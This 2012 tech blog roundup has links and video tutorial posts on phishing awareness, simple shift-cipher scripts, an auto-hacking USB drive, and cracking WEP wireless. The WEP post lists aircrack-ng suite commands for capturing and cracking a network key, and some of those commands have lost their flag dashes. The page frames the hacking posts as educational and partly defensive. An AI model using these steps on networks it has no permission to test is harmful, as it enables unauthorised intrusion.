Cool Geek Stuff – May 16th, 2012

Cool geek stuff for the week of May 16th, 2012
VIEW AND VOTE FOR YOUR FAVORITE LINKS!
http://www.tinkernut.com/tinkernerdz

Tutorial of the week:
http://www.youtube.com/watch?v=rY6byKbAgGQ
Install the Android OS on a PC using VirtualBox

Game of the week:
http://www.realmofthemadgod.com/
Realm of the Mad God is a massively co-op 16-bit action RPG that drops you into the thick of the fight in a world overwhelmed by monsters

Cool Site of the week:
http://www.youtubedisco.de/
Mix and Remix Youtube videos and become your own internet VJ!

The Art Of Phishing


Phishing is a means of fooling people into giving you their private information. This video shows the basics of how phishing schemes work so that you can avoid becoming a victim.

http://www.tinkernut.com/chat
http://www.tinkernut.com/forum

How To Make Your Own Encryption

****UPDATE: DOWNLOAD THE PROJECT FILES****

This video lays out the steps for creating a very simple encryption and decryption program using free tools. The programming language we will be using is VB Script.  See if you can decrypt this text:

wkjlue#vnrro#huxwxi#uxr\


The code below is for the encrypting program:

<—–Start copying below this line—–>
‘SIMPLE VB ENCRYPTION PROGRAM
‘Create a dialogue box that asks for the text to encode
set x = WScript.CreateObject(“WScript.Shell”)
mySecret = inputbox(“Enter text to be encoded”)
‘Reverse the submitted text
mySecret = StrReverse(mySecret)
‘Open up an instance of Notepad to print the results after waiting for 1 second
x.Run “%windir%\notepad”
wscript.sleep 1000
x.sendkeys encode(mySecret)’This function encodes the text by advancing each character 3 letters
function encode(s)
For i = 1 To Len(s)
newtxt = Mid(s, i, 1)
newtxt = Chr(Asc(newtxt)+3)
coded = coded & newtxt
Next
encode = coded
End Function
<—-Stop copying above this line——>
<—–Start copying below this line—–>
‘SIMPLE VB DECRYPTION PROGRAM
‘Create a dialogue box that asks for the text to encode
set x = WScript.CreateObject(“WScript.Shell”)
mySecret = inputbox(“Enter text to be encoded”)
‘Reverse the submitted text
mySecret = StrReverse(mySecret)
‘Open up an instance of Notepad to print the results after waiting for 1 second
x.Run “%windir%\notepad”
wscript.sleep 1000
x.sendkeys encode(mySecret)’This function encodes the text by advancing each character 3 letters
function encode(s)
For i = 1 To Len(s)
newtxt = Mid(s, i, 1)
newtxt = Chr(Asc(newtxt)-3)
coded = coded & newtxt
Next
encode = coded
End Function
<—-Stop copying above this line——>
<—–Start copying below this line—–>
–Applescript encryption program
set words_to_encrypt to “I want to encrypt sentences. Not just words!”
set multiplier to 5
set charList to {“a”, “b”, “c”, “d”, “e”, “f”, “g”, “h”, “i”, “j”, “k”, “l”, “m”, “n”, “o”, “p”, “q”, “r”, “s”, “t”, “u”, “v”, “w”, “x”, “y”, “z”,”A”, “B”, “C”, “D”, “E”, “F”, “G”, “H”, “I”, “J”, “K”, “L”, “M”, “N”, “O”, “P”, “Q”, “R”, “S”, “T”, “U”, “V”, “W”, “X”, “Y”, “Z”, “1”, “2”, “3”,”4″, “5”, “6”, “7”, “8”, “9”, “0”, ” “, “~”, “!”, “@”, “#”, “$”, “%”, “^”, “&”, “*”, “(“, “)”, “_”, “+”, “{“, “}”, “|”, “:”, “\””, “<“, “>”, “?”, “`”, “-“,”=”, “[“, “]”, “\\”, “;”, “‘”, “,”, “.”, “/”, “a”}considering case
–get a list of numbers for the words corresponding to the item numbers of the characters in charList
set p_letter_list to text items of words_to_encrypt
set p_num_list to {}
repeat with i from 1 to (count of p_letter_list)
set this_letter to item i of p_letter_list
repeat with j from 1 to count of charList
set this_char to item j of charList
if this_letter is this_char then
set end of p_num_list to j
exit repeat
end if
end repeat
end repeat
–encrypt the numbers
set modulus to count of charList
set c_num_list to {}
repeat with i from 1 to (count of p_num_list)
set p_num to item i of p_num_list
set c_num to ((p_num * multiplier) mod modulus)
set end of c_num_list to c_num
end repeat
–get the characters for the encrypted numbers corresponding to the characters in charList
set c_letter_list to {}
repeat with i from 1 to (count of c_num_list)
set this_item to item i of c_num_list
set end of c_letter_list to (item this_item of charList)
end repeat
–coerce the encrypted characters into a string
set c_string to c_letter_list as string
end considering
<—-Stop copying above this line——>

What is hacking?

What do you think of when you hear the word “hack”? Do you know what it means to really be a hacker? This video tries to help shed some light on hacking.

Hacker Manifesto:

http://www.mithral.com/~beberg/manifesto.html

How to become a hacker:

http://catb.org/~esr/faqs/hacker-howto.html

How To Make An Auto Hacking USB Drive


This video will show you how to make an auto-hacking USB drive and how to protect yourself from them.
You can find all scripts at my forum post: http://www.tinkernut.com/forum/video-tutorial-help/how-to-make-an-auto-hacking-usb-drive
U3 Universal customizer- http://www.u3community.com/viewtopic.php?t=434
Batch to exe converter http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html
Nirsoft Utilities http://www.nirsoft.net

How To Hack Wireless

This video shows one method of hacking a wireless WEP connection and gives you some tips on how to better secure your wireless.

WEBSITES:
http://www.backtrack-linux.org
http://www.imgburn.com

TERMINAL COMMANDS:
Startx
/etc/init.d/networking start
airmon-ng
airmon-ng stop [wireless card name] airmon-ng start [wireless card name] airmon-ng
airodump-ng [wireless card name] ctrl c
airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name] aireplay-ng -1 0 a [bssid] [wireless card name] aireplay-ng -3 b [bssid][wireless card name] ctrl + c
dir
aircrack-ng [filename]